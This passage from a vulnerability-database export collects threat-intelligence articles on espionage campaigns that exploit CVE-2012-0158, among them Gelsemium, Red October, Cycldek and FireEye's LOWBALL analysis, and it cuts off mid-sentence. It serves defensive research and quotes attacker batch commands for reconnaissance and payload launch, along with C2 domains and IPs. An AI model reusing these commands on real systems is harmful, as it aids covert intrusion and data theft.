"THN:59AA6ADFEEB67D7E156CDF3579330697", "href": "http://thehackernews.com/2013/09/chinese-apt-espionage-campaign-dubbed.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:37:57", "description": "[](<https://thehackernews.com/images/-2P9JF1_9yIc/YMdax55TYnI/AAAAAAAAC2o/YR05yeE9O-8JHf9oekreAzoMGSYXbsdlwCLcBGAsYHQ/s0/suppply-chain-cyberattack.jpg>)\n\nA new cyber espionage group named Gelsemium has been linked to a [supply chain attack targeting the NoxPlayer](<https://thehackernews.com/2021/02/a-new-software-supplychain-attack.html>) Android emulator that was disclosed earlier this year.\n\nThe findings come from a systematic analysis of multiple campaigns undertaken by the APT crew, with evidence of the earliest attack dating back all the way to 2014 under the codename [Operation TooHash](<https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf>) based on malware payloads deployed in those intrusions.\n\n\"Victims of these campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities,\" cybersecurity firm ESET [said](<https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/>) in an analysis published last week.\n\n\"Gelsemium's whole chain might appear simple at first sight, but the exhaustive configurations, implanted at each stage, modify on-the-fly settings for the final payload, making it harder to understand.\"\n\nTargeted countries include China, Mongolia, North and South Korea, Japan, Turkey, Iran, Iraq, Saudi Arabia, Syria, and Egypt.\n\nSince its origins in the mid-2010s, Gelsemium has been found employing a variety of malware delivery techniques ranging from spear-phishing documents exploiting Microsoft Office vulnerabilities ([CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>)) and watering holes to a remote code execution flaw in Microsoft Exchange Server \u2014 likely [CVE-2020-0688](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688>), which was addressed by the Windows maker in [June 2020](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>) \u2014 to deploy the [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell.\n\n[](<https://thehackernews.com/images/-erpEkE7yQsA/YMdYTWXAq3I/AAAAAAAAC2g/aFWtWeFaNBkcFx5QqUn08XgGEREESzmBQCLcBGAsYHQ/s0/malware.jpg>)\n\nAccording to ESET, Gelsemium's first stage is a C++ dropper named \"Gelsemine,\" which deploys a loader \"Gelsenicine\" onto the target system, which, in turn, retrieves and executes the main malware \"**Gelsevirine**\" that's capable of loading additional plug-ins provided by the command-and-control (C2) server.\n\nThe adversary is said to have been behind a supply chain attack aimed at BigNox's NoxPlayer, in a campaign dubbed \"**Operation NightScout**,\" in which the software's update mechanism was compromised to install backdoors such as **Gh0st RAT** and **PoisonIvy RAT** to spy on its victims, capture keystrokes, and gather valuable information.\n\n\"Victims originally compromised by that supply chain attack were later being compromised by Gelsemine,\" ESET researchers Thomas Dupuy and Matthieu Faou noted, with similarities observed between the trojanized versions of NoxPlayer and Gelsemium malware.\n\nWhat's more, another backdoor called **Chrommme**, which was detected on an unnamed organization's machine also compromised by the Gelsemium group, used the same C2 server as that of Gelsevirine, raising the possibility that the threat actor may be sharing the attack infrastructure across its malware toolset.\n\n\"The Gelsemium biome is very interesting: it shows few victims (according to our telemetry) with a vast number of adaptable components,\" the researchers concluded. \"The plug-in system shows that developers have deep C++ knowledge.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T13:34:00", "type": "thn", "title": "NoxPlayer Supply-Chain Attack is Likely the Work of Gelsemium Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2020-0688"], "modified": "2021-06-14T13:34:33", "id": "THN:9B536B531E6948881A29BEC793495D1E", "href": "https://thehackernews.com/2021/06/noxplayer-supply-chain-attack-is-likely.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-01-08T18:01:26", "description": "A new sensational discovered has been announced by Kaspersky Lab\u2019s Global Research & Analysis Team result of an investigation after several attacks hit computer networks of various international diplomatic service agencies.\n\n[](<http://3.bp.blogspot.com/-oLHA29NAIM8/UPUy7lMIn9I/AAAAAAAAAI4/5CzgGdxDSeU/s1600/Red+October+Operation.png>)\n\nA new large scale [cyber-espionage](<http://securityaffairs.co/wordpress/11405/intelligence/cyberespionage-another-watering-hole-attack-against-us-website.html>) operation has been discovered, named **Red October**, name inspired by famous novel **The Hunt For The Red October (ROCRA)** and chosen because the investigation started last October.\n\n \n\n\nThe campaign hit hundreds of machines belonging to following categories:\n\n * Government\n * Diplomatic / embassies\n * Research institutions\n * Trade and commerce\n * Nuclear / energy research\n * Oil and gas companies\n * Aerospace\n * Military\n\nThe attackers have targeted various devices such as enterprise network equipment and mobile devices (Windows Mobile, iPhone, Nokia), hijacking files from removable disk drives, stealing e-mail databases from local Outlook storage or remote POP/IMAP server and siphoning files from local network FTP servers.\n\n \n \n\n\nAccording security experts involved in the investigation the cyber-espionage campaign was started since 2007 and is still active, during this long period the attackers obtained a huge quantity of information such as service credentials that hav been reused in later attacks.\n\n \n\n\nThe control structure discovered is very complex and extended, more than 60 domain names and several server hosting located in many countries mainly Germany and Russia. A particularity of the C&C architecture is that the network is arranged to hide the mothership-server true proxy functionality of every node in the malicious structure.\n\n \n\n\nSecurity experts were able to sinkhole six of the 60 domains used during the period 2 Nov 2012 - 10 Jan 2013, registering over 55,000 connections to the sinkhole from 250 different victim\u2019s IPs from 39 different countries, with most of IPs being from Switzerland. Kazakhstan and Greece follow next.\n\n[](<http://3.bp.blogspot.com/-2eJDE126xVU/UPUzWdD6aII/AAAAAAAAAJA/bK4zpvEs7WA/s1600/Red+October+Operation.png>)\n\n**Red October Geo-distribution of victims**\n\nWhich are the vulnerabilities exploited for the attacks?\n\nThe security expert discovered that at least three different known vulnerabilities have been exploited\n\n * CVE-2009-3129 (MS Excel) [attacks dated 2010 and 21011]\n * CVE-2010-3333 (MS Word) [attacks conducted in the summer of 2012]\n * CVE-2012-0158 (MS Word) [attacks conducted in the summer of 2012]\n\nEvidences collected during the investigation let security specialists to believe that attackers have Russian origins, but strangely they appear unrelated to any other cyber attacks detected until now. The exploits appear to have been created by Chinese hackers.\n\n \n\n\n**Attack Method**\n\nThese attacks is structured in two distinct phases according a classic schema of targeted attacks:\n\n 1. Initial infection\n 2. Additional modules deployed for intelligence gathering\n\nIn the initial phase the malware is delivered via e-mail as attachments (Microsoft Excel, Word and, probably PDF documents), once victims opened the malicious document the embedded malicious code initiated the setup of the main component which in turn handled further communication with the C&C servers, after the malware receives from the C&C server a number of additional spy modules. \n \n\n\nThe way to infect entire network is very efficient, the hackers used a module to scan target infrastructure searching for vulnerable machines. The attacks against each machine and related services is made exploiting the above vulnerabilities or gaining access to it using credentials collected during other attacks of the same campaign. The exploits appear to have been created by Chinese hackers. \n \n\n\nWhat alarms me is that such campaigns could be going on for years with disastrous consequences ... _what to do at this point? How is it possible that an operation so extended escape for so long to world wide security community? Who is behind the attacks? Cyber criminals or state-sponsored hackers?_\n\n \n\n\n**UPDATE 2013/01/15**\n\nJeffrey Carr, founder and CEO of Taia Global, Inc, posted on [his blog](<http://jeffreycarr.blogspot.it/2013/01/rbn-connection-to-kasperskys-red.html>)\n\n \n\n\nThe developers behind ROCRA, who are Russian, are comfortable using Chinese malware and adapting it for their own use according to the Kaspersky report. This fits the RBN profile to a \u2018t\u2019. I ran 13 IPs listed in Kaspersky\u2019s report against the [RBN list](<http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt>) maintained by James McQuade and found matching IP blocks for five of them:\n\n \n\n\n**Malicious servers**\n\n * 178.63.208.49 matches to 178.63.\n * 188.40.19.247 matches to 188.40.\n * 78.46.173.15 matches to 78.46.\n * 88.198.30.44 matches to 88.198.\n\n**Mini-motherships**\n\n * 91.226.31.40 matches to 91.226.\n\nIt has been my belief for many years that the RBN has a working relationship with the Russian government; that it disappeared from view when the FBI sought the assistance of the FSB to shut down their operations in 2007 (as detailed in chapter 8 of my book); and that it has continued operating below the radar all this time. It provides distance and deniability to the FSB for certain offensive cyber operations and, in exchange, the FSB allows the RBN to operate as a criminal enterprise; a portion of which involves selling the data that it steals to whomever is interested.Red October is already the most significant find of the new year. If, in fact, Kaspersky has uncovered an RBN-controlled espionage ring, it\u2019s going to be one of the most important discoveries of the decade.\n", "cvss3": {}, "published": "2013-01-14T23:49:00", "type": "thn", "title": "Operation Red October : Cyber Espionage campaign against many Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2009-3129"], "modified": "2013-10-14T11:49:51", "id": "THN:B02C7C78600ED331232ABD4D1F8D2C4A", "href": "http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:38:26", "description": "[](<https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg>)\n\nA Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to a newly published research by Kaspersky yesterday. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit **and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. \"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. \"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. \n \n\n\n[](<https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg>)\n\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year. \n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. \"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. \"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-04T08:31:00", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-04T08:31:39", "id": "THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Allows remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers \"system state\" corruption, as exploited in the wild in April 2012, aka \"MSCOMCTL.OCX Remote Code Execution Vulnerability.", "cvss3": {}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSCOMCTL.OCX Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2012-0158", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2017-12-14T08:35:01", "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nb9208a5b0504cb2283b1144fc455eaaa\n\n| \n\n\u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc \n \nec19ed7cddf92984906325da59f75351\n\n| \n\n\u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc \n \n6495b384748188188d09e9d5a0c401a4\n\n| \n\n(\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc \n \nIn all three cases, the payload was the same:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\ntime.exe \n \nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage \nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.\n\nAfter execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\nWmiApCom \n \n79b68cdd0044edd4fbf8067b22878644\n\n| \n\nWmiApCom.bat \n \nThe \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. Once the LOWBALL malware calls back to the Dropbox account, the attackers will create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d which contains commands to be executed on the compromised computer. This batch file is then executed on the target computer, with the results uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n@echo off \n \n--- \n \ndir c:\\ >> %temp%\\download \n \nipconfig /all >> %temp%\\download \n \nnet user >> %temp%\\download \n \nnet user /domain >> %temp%\\download \n \nver >> %temp%\\download \n \ndel %0 \n \n@echo off \n \ndir \"c:\\Documents and Settings\" >> %temp%\\download \n \ndir \"c:\\Program Files\\ \n \n\" >> %temp%\\download \n \nnet start >> %temp%\\download \n \nnet localgroup administrator >> %temp%\\download \n \nnetstat -ano >> %temp%\\download \n \nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n@echo off \n \n--- \n \nren \"%temp%\\upload\" audiodg.exe \n \nstart %temp%\\audiodg.exe \n \ndir d:\\ >> %temp%\\download \n \nsysteminfo >> %temp%\\download \n \ndel %0 \n \nWe have previously observed the admin@338 group use BUBBLEWRAP. This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\nMD5\n\n| \n\n| \n \n---|---|--- \n \n0beb957923df2c885d29a9c1743dd94b\n\n| \n\naccounts.serveftp.com\n\n| \n\n59.188.0.197 \n \nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify if admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and almost always uploads the results of download.rar to the cloud storage account\n * silent.txt and period.txt, small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC\n\nThe threat actor will then download the results and then delete the files from the cloud storage account.\n\n# Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. \n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. Poison Ivy: Assessing Damage and Extracting Intelligence\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u2019\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. Pro-Democracy Media Company\u2019s Websites Attacked. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight. 31 August 2015. http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "edition": 2, "cvss3": {}, "published": "2015-12-01T08:00:00", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2015-12-01T08:00:00", "id": "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:17", "description": "**Introduction** \nOn May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets.\n\nThis group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. Proofpoint also discussed the threat actors, whom they call [Transparent Tribe](<https://www.proofpoint.com/us/threat-insight/post/Operation-Transparent-Tribe>), in a March blog post.\n\nIn this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government\u2019s [7th Central Pay Commission (CPC)](<http://zeenews.india.com/business/news/economy/7th-pay-commission-govt-employees-likely-to-get-huge-pay-checks-by-june-july-2016_1880390.html>). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.\n\n**Malware Delivery Method** \nIn all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the [CVE-2012-0158 vulnerability](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to drop a malicious payload.\n\nIn previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.\n\nThe email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests the recipient to open the attachment associated with the 7th Pay Commission. Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other non-public addressees through other means.\n\n** \nFigure 1: Contents of the Email**\n\nA review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.\n\n**Exploit Analysis** \nDespite being an older vulnerability, many threat actors continue to leverage [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.\n\n \n\n\n**Figure 2: Exploit Shellcode used to Locate and Decode Payload**\n\nThe shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:\n\n\n\nLastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces\u2019 pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.\n\n \n\n\n**Figure 3: Decoy Document related to 7th Pay Commission**\n\nThe decoy document's metadata (Figure 